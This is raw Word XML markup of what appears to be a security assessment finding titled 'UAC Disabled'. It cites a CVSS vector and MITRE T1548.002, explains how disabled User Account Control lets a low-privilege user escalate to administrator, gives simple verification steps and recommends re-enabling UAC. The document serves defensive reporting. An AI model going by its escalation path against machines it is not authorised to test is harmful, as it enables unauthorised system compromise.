      <w:hyperlink r:id="R6ace8bd009f04f41">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="21BAD07B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Phoenixnap - Configuring Firewall with UFW on Ubuntu</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4D46EFFB" w14:textId="2DBD9025">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4870B708" w14:textId="64BAC27D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1244207E" w:rsidP="0D325B6E" w:rsidRDefault="1244207E" w14:paraId="25165D08" w14:textId="4D628474">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc2070746746" w:id="987247023"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1244207E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1244207E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc938780431" w:id="1291717279"/>
      <w:bookmarkStart w:name="_Toc951224994" w:id="970284809"/>
      <w:bookmarkStart w:name="_Toc1423238389" w:id="1166756702"/>
      <w:bookmarkStart w:name="_Toc188150461" w:id="481710085"/>
      <w:bookmarkStart w:name="_Toc772156588" w:id="1193794513"/>
      <w:bookmarkStart w:name="_Toc1958150172" w:id="685640753"/>
      <w:bookmarkStart w:name="_Toc313427688" w:id="412024743"/>
      <w:bookmarkStart w:name="_Toc64065717" w:id="1073116675"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="273BBEC5">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="668724C2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UAC Disabled</w:t>
      </w:r>
      <w:bookmarkEnd w:id="685640753"/>
      <w:bookmarkEnd w:id="412024743"/>
      <w:bookmarkEnd w:id="1073116675"/>
      <w:bookmarkEnd w:id="1291717279"/>
      <w:bookmarkEnd w:id="970284809"/>
      <w:bookmarkEnd w:id="1166756702"/>
      <w:bookmarkEnd w:id="481710085"/>
      <w:bookmarkEnd w:id="1193794513"/>
      <w:bookmarkEnd w:id="98724702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734B2E6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324251" w14:textId="4EB0A2D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E01BC1" w14:textId="0647BEE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8A7E334" w14:textId="586D7F4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30884B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2398F5" w14:textId="174B5D1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9763486" w14:textId="783E42FD">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C5BFE71" w14:textId="0FA27EDD">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8.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="2E8BCC55">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>5</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053AC1A" w14:textId="5EE09F90">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0088DF6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3F3F44" w14:textId="2AAD332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36D6FC16" w:rsidP="0D325B6E" w:rsidRDefault="36D6FC16" w14:paraId="525FF881" w14:textId="13240E5B">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36D6FC16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCap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D293710"/>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7BA614D"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1D3392C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41173B" w14:textId="06A09EE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AF81119" w:rsidP="0D325B6E" w:rsidRDefault="2AF81119" w14:paraId="1E1CC5B6" w14:textId="2D511F92">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="25"/>
                <w:szCs w:val="25"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="R4115b8daead74e73">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2AF81119">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="76BB8ABB">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391D50A" w14:textId="7B95902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9897BD" w14:textId="677B0779">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AEAD9CC" w:rsidP="0D325B6E" w:rsidRDefault="5AEAD9CC" w14:paraId="2A5CC1FB" w14:textId="7D6B7F37">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R6622259cdc9d4612">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5AEAD9CC">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1548.002</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="42484A15">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>: Abuse Elevation Control Mechanism -</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5AEAD9CC">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bypass User Account Control</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0EEB3DBE">
        <w:trPr>
          <w:trHeight w:val="784"/>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BB26C4D"/>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114AAA9" w14:textId="43E03E3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4EE9B0E" w:rsidP="0D325B6E" w:rsidRDefault="04EE9B0E" w14:paraId="68016EEC" w14:textId="58D2C8FF">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3b4376fddb3d4102">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="04EE9B0E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1052: User Account Control</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="561F8EE2">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75BDB2D" w14:textId="44A6F3BD">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C75A8D1" w14:textId="53DFE7C3">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39D258C1" w14:textId="3D1AF97B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="273BBEC5" w:rsidP="0D325B6E" w:rsidRDefault="273BBEC5" w14:paraId="054FCB6C" w14:textId="32D7BAC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3BBEC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3B2E581" w:rsidP="0D325B6E" w:rsidRDefault="63B2E581" w14:paraId="3D22BD0F" w14:textId="37FA535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B2E581">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The machine </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1BA9891B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">has User Account Control (UAC) </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="23262526">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1BA9891B">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353B4D82">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BA9891B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>abled or configured to the lowest setting, “Never Notify</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1BA9891B">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1BA9891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17BFDE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">UAC is a Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1D2A0FBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="117BFDE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="117BFDE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that prevents unauthorized changes by requiring administrative verification for actions affecting the operating system.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5A43CC7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92729AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>With UAC disabled, a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5A43CC70">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ny user can execute code with administrative privileges without</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="06F6F414">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> verification</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="512C9753">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5E587A6F" w14:textId="0115E570">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73BBEC5" w:rsidP="0D325B6E" w:rsidRDefault="273BBEC5" w14:paraId="68840282" w14:textId="524760F6">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73BBEC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1E29030" w:rsidP="0D325B6E" w:rsidRDefault="11E29030" w14:paraId="142EC1DD" w14:textId="72CB833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1E29030">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who gains low-privilege access </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B3B5C86">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11E29030">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> escalate their privileges to a full administrator. This lead</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7985D2CA">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1E29030">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a full </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11E29030">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11E29030">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> compromise, allowing attackers to steal sensitive data and move laterally to compromise other systems on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1390F253" w14:textId="1F92651B">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73BBEC5" w:rsidP="0D325B6E" w:rsidRDefault="273BBEC5" w14:paraId="31B7FF02" w14:textId="0E07A8A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3BBEC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1FBAFED" w:rsidP="0D325B6E" w:rsidRDefault="41FBAFED" w14:paraId="5AD91A1B" w14:textId="1AB0243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1FBAFED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1: Log into the affected Windows machine with a user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="41FBAFED" w:rsidP="0D325B6E" w:rsidRDefault="41FBAFED" w14:paraId="62B2F4D8" w14:textId="46DBEC0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1FBAFED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Attempt to </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 xml:space="preserve">open PowerShell as </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administrator and</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 xml:space="preserve"> that it opens </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immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7C495552">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> without a UAC prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0ADA78EA" w14:textId="45636E1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954F26E" w14:textId="03E481BF">
      <w:pPr>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0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="25FCE9A5" w14:textId="4399F87F">
      <w:pPr>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273BBEC5" w:rsidP="0D325B6E" w:rsidRDefault="273BBEC5" w14:paraId="1B24DFEA" w14:textId="37C4383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3BBEC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73BBEC5" w:rsidP="0D325B6E" w:rsidRDefault="273BBEC5" w14:paraId="5C8AFD3A" w14:textId="2C9FAC4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3BBEC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73BBEC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7E9A9BD7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E9A9BD7" w:rsidP="0D325B6E" w:rsidRDefault="7E9A9BD7" w14:paraId="53712F63" w14:textId="25247F19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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9A9BD7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable UAC and set it to the default “Notify me only when apps try to make </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7E9A9BD7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changes to my computer” or higher.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="591E9B41" w:rsidP="0D325B6E" w:rsidRDefault="591E9B41" w14:paraId="38CD2F2B" w14:textId="60EAA4F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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91E9B41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7E9A9BD7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
